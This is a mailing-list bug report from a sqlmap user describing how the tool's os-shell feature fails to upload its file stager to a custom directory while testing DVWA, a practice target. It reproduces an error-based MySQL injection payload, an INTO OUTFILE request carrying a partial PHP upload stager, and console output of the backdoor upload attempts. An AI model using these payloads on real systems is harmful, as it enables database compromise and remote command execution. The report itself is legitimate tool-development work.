[sqlmap-users] os-shell bug
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] os-shell bug
|
From: Robin W. <ro...@di...> - 2011-11-03 13:40:34
|
I think I've found a bug in the os-shell command when specifying extra
directories to try to upload a shell file to. In this example I've
told it the full document root is /opt/lampp/htdocs but I've made a
directory in there called uploads which has full write permissions. I
specify the uploads directory when asked for additional web server
paths, giving it the full server path of /opt/lampp/htdocs/uploads.
Watching the traffic in Burp it first tries to upload to the root
which fails, it then tries the uploads directory but when it checks to
see if the file has been uploaded it checks for the temporary file in
the vulnerabilities directory not the uploads directory. It then tries
an upload to the vulnerabilities directory (it has previously detected
this so I assume that is why it is trying it) and again fails but does
try to check the right directory this time. I've attached a screenshot
from Burp showing the hits.
Manually checking the uploads directory it hasn't managed to upload
the file even though it should be able to as the directory is fully
writable and the db is mysql running as root, I think this could be
down to the query being sent across. I know the decoding here isn't
quite right but it is adding the php to the wrong place in the query:
GET /vulner«ilities/sqli/?id= % LIMIT% 1% INTO% OUTFILE%
%'%/opt%/lampp%/htdocs%/uploads%/tmpuzmzk.php%'% LINES% TERMINATí%
BY% 0x<?php
if (isset($_REQUEST["upload"])) {
$dir=$_REQUEST["uploadDir"];
I'm doing all of this against DVWA with a manually created uploads directory.
Robin
sqlmap-dev $ ./sqlmap.py -c dvwa.conf --os-shell --proxy=http://localhost:8080
sqlmap/1.0-dev (r4488) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program
[*] starting at 12:42:06
[12:42:07] [INFO] using
'/Users/robin/src/sqlmap-dev/output/192.168.56.101/session' as session
file
[12:42:07] [INFO] resuming injection data from session file
[12:42:07] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[12:42:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0
HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=12 AND (SELECT 6722 FROM(SELECT
COUNT(*),CONCAT(0x3a64657a3a,(SELECT (CASE WHEN (6722=6722) THEN 1
ELSE 0 END)),0x3a6a76633a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
---
[12:42:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[12:42:09] [INFO] going to use a web backdoor for command prompt
[12:42:09] [INFO] fingerprinting the back-end DBMS operating system
[12:42:09] [INFO] the back-end DBMS operating system is Linux
[12:42:09] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[12:42:12] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]: /opt/lampp/htdocs
[12:42:19] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload
the agent [Enter for None]: /opt/lampp/uploads/
[12:42:30] [INFO] heuristics detected web page charset 'ascii'
[12:42:33] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs'
[12:42:36] [WARNING] unable to upload the file stager on '/opt/lampp/uploads'
[12:42:38] [WARNING] unable to upload the file stager on
'/opt/lampp/htdocs/vulnerabilities'
[12:42:38] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 3 times
[12:42:38] [INFO] Fetched data logged to text files under
'/Users/robin/src/sqlmap-dev/output/192.168.56.101'
[*] shutting down at 12:42:38
|
